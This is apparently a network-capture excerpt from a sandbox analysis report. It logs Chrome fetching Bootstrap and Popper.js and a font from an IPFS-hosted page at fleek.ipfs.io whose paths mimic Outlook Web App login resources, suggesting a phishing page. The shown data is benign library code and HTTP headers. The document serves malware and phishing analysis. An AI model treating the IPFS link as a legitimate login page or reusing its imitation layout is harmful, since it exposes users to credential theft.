                                                                                2023-10-12 15:42:16 UTC1015INData Raw: 48 4f 57 4e 3a 22 73 68 6f 77 6e 22 2b 6b 65 2c 49 4e 53 45 52 54 45 44 3a 22 69 6e 73 65 72 74 65 64 22 2b 6b 65 2c 43 4c 49 43 4b 3a 22 63 6c 69 63 6b 22 2b 6b 65 2c 46 4f 43 55 53 49 4e 3a 22 66 6f 63 75 73 69 6e 22 2b 6b 65 2c 46 4f 43 55 53 4f 55 54 3a 22 66 6f 63 75 73 6f 75 74 22 2b 6b 65 2c 4d 4f 55 53 45 45 4e 54 45 52 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2b 6b 65 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 6b 65 7d 2c 46 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7c 7c 74 68 69 73 7d 6e 3d 74 2c 28 65 3d 69 29 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e
                                                                                Data Ascii: HOWN:"shown"+ke,INSERTED:"inserted"+ke,CLICK:"click"+ke,FOCUSIN:"focusin"+ke,FOCUSOUT:"focusout"+ke,MOUSEENTER:"mouseenter"+ke,MOUSELEAVE:"mouseleave"+ke},Fe=function(t){var e,n;function i(){return t.apply(this,arguments)||this}n=t,(e=i).prototype=Object.
                                                                                2023-10-12 15:42:16 UTC1016INData Raw: 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 65 7d 7d 2c 7b 6b 65 79 3a 22 4e 41 4d 45 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 65 7d 7d 2c 7b 6b 65 79 3a 22 44 41 54 41 5f 4b 45 59 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 65 7d 7d 2c 7b 6b 65 79 3a 22 45 76 65 6e 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 65 7d 7d 2c 7b 6b 65 79 3a 22 45 56 45 4e 54 5f 4b 45 59 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 65 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 54
                                                                                Data Ascii: ",get:function(){return"4.1.0"}},{key:"Default",get:function(){return Re}},{key:"NAME",get:function(){return Ne}},{key:"DATA_KEY",get:function(){return Oe}},{key:"Event",get:function(){return Ke}},{key:"EVENT_KEY",get:function(){return ke}},{key:"DefaultT
                                                                                2023-10-12 15:42:16 UTC1017INData Raw: 53 43 52 4f 4c 4c 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 2e 5f 70 72 6f 63 65 73 73 28 74 29 7d 29 2c 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 68 69 73 2e 5f 70 72 6f 63 65 73 73 28 29 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 3d 3d 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 77 69 6e 64 6f 77 3f 74 6e 3a 65 6e 2c 72 3d 22 61 75 74 6f 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 3f 74 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 2c 73 3d 72 3d 3d 3d 65 6e 3f 74 68 69 73 2e 5f
                                                                                Data Ascii: SCROLL,function(t){return n._process(t)}),this.refresh(),this._process()}var t=n.prototype;return t.refresh=function(){var e=this,t=this._scrollElement===this._scrollElement.window?tn:en,r="auto"===this._config.method?t:this._config.method,s=r===en?this._
                                                                                2023-10-12 15:42:16 UTC1019INData Raw: 2c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 7d 2c 74 2e 5f 67 65 74 4f 66 66 73 65 74 48 65 69 67 68 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 3d 3d 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3a 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 68 65 69 67 68 74 7d 2c 74 2e 5f 70 72 6f 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 28 29 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 2c 65 3d 74 68 69 73 2e 5f
                                                                                Data Ascii: ,document.documentElement.scrollHeight)},t._getOffsetHeight=function(){return this._scrollElement===window?window.innerHeight:this._scrollElement.getBoundingClientRect().height},t._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._
                                                                                2023-10-12 15:42:16 UTC1020INData Raw: 6e 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 56 65 28 74 68 69 73 29 2e 64 61 74 61 28 42 65 29 3b 69 66 28 74 7c 7c 28 74 3d 6e 65 77 20 6e 28 74 68 69 73 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 29 2c 56 65 28 74 68 69 73 29 2e 64 61 74 61 28 42 65 2c 74 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 74 5b 65 5d 28 29 7d 7d 29 7d 2c 6f 28
                                                                                Data Ascii: n._jQueryInterface=function(e){return this.each(function(){var t=Ve(this).data(Be);if(t||(t=new n(this,"object"==typeof e&&e),Ve(this).data(Be,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},o(
                                                                                2023-10-12 15:42:16 UTC1021INData Raw: 6e 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 3b 69 66 28 65 29 7b 76 61 72 20 73 3d 22 55 4c 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 70 6e 3a 6d 6e 3b 69 3d 28 69 3d 72 6e 2e 6d 61 6b 65 41 72 72 61 79 28 72 6e 28 65 29 2e 66 69 6e 64 28 73 29 29 29 5b 69 2e 6c 65 6e 67 74 68 2d 31 5d 7d 76 61 72 20 6f 3d 72 6e 2e 45 76 65 6e 74 28 6c 6e 2e 48 49 44 45 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 7d 29 2c 61 3d 72 6e 2e 45 76 65 6e 74 28 6c 6e 2e 53 48 4f 57 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 69 7d 29 3b 69 66 28 69 26 26 72 6e 28 69 29 2e 74 72 69 67 67 65 72 28 6f 29 2c 72 6e 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 61 29 2c 21 61 2e 69 73 44 65 66 61 75 6c
                                                                                Data Ascii: nt(this._element);if(e){var s="UL"===e.nodeName?pn:mn;i=(i=rn.makeArray(rn(e).find(s)))[i.length-1]}var o=rn.Event(ln.HIDE,{relatedTarget:this._element}),a=rn.Event(ln.SHOW,{relatedTarget:i});if(i&&rn(i).trigger(o),rn(this._element).trigger(a),!a.isDefaul
                                                                                2023-10-12 15:42:16 UTC1023INData Raw: 7d 2c 69 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 6e 28 74 68 69 73 29 2c 65 3d 74 2e 64 61 74 61 28 73 6e 29 3b 69 66 28 65 7c 7c 28 65 3d 6e 65 77 20 69 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 73 6e 2c 65 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 65 5b 6e 5d 28 29 7d 7d 29 7d 2c 6f 28 69 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c
                                                                                Data Ascii: },i._jQueryInterface=function(n){return this.each(function(){var t=rn(this),e=t.data(sn);if(e||(e=new i(this),t.data(sn,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n]()}})},o(i,null,[{key:"VERSION",
                                                                                2023-10-12 15:42:16 UTC1024INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                22192.168.2.449760104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC1024OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                Host: cdnjs.cloudflare.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                23192.168.2.449753209.94.90.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC1024OUTGET /owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf HTTP/1.1
                                                                                Host: fleek.ipfs.io
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: same-origin
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: font
                                                                                Referer: https://fleek.ipfs.io/ipfs/bafybeihtztyufkrntgb7cmm4lgq5t54q4wirnm5o5xwj445xq22kpotsqa/owalogo.html
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                24192.168.2.449761104.18.11.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC1025OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                25209.94.90.1443192.168.2.449753C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC1026INHTTP/1.1 301 Moved Permanently
                                                                                Server: openresty
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Location: https://ipfs.tech/owa/auth/15.1.1591/themes/resources/segoeui-regular.ttf
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Allow-Headers: X-Requested-With, Range, Content-Range, X-Chunked-Output, X-Stream-Output
                                                                                Access-Control-Expose-Headers: Content-Range, X-Chunked-Output, X-Stream-Output
                                                                                X-IPFS-LB-POP: gateway-bank3-sv15
                                                                                X-BFID: c00f97304ba86d5d617c59a39dd68fc4
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                2023-10-12 15:42:16 UTC1026INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                26104.17.24.14443192.168.2.449760C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC1027INHTTP/1.1 200 OK
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
                                                                                Cache-Control: public, max-age=30672000
                                                                                ETag: W/"5eb03fa9-4af4"
                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                cf-cdnjs-via: cfworker/kv
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                Timing-Allow-Origin: *
                                                                                X-Content-Type-Options: nosniff
                                                                                CF-Cache-Status: HIT
                                                                                Age: 11569195
                                                                                Expires: Tue, 01 Oct 2024 15:42:16 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P3IwVmoPHesyNF1G3JlkYO69EPcfeenNM2GpZdkuaRwOV%2Fy0SQthFBIn8SRar4kuNJweeBLPyE1fmf63vsAN3IcKlN4MJauzj5yCxw%2Bvt35svs783tNe%2FE%2B%2F1UG%2FBqg%2BjQ2qIKdh"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                Strict-Transport-Security: max-age=15780000
                                                                                Server: cloudflare
                                                                                CF-RAY: 815073ab7c7a7cef-LAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2023-10-12 15:42:16 UTC1027INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                2023-10-12 15:42:16 UTC1028INData Raw: 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23
                                                                                Data Ascii: ){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#
                                                                                2023-10-12 15:42:16 UTC1029INData Raw: 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74
                                                                                Data Ascii: n l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat
                                                                                2023-10-12 15:42:16 UTC1031INData Raw: 2c 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74
                                                                                Data Ascii: ,h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft
                                                                                2023-10-12 15:42:16 UTC1032INData Raw: 69 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61
                                                                                Data Ascii: ight,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){va
                                                                                2023-10-12 15:42:16 UTC1033INData Raw: 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20
                                                                                Data Ascii: &&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var
                                                                                2023-10-12 15:42:16 UTC1035INData Raw: 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74
                                                                                Data Ascii: ers(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t
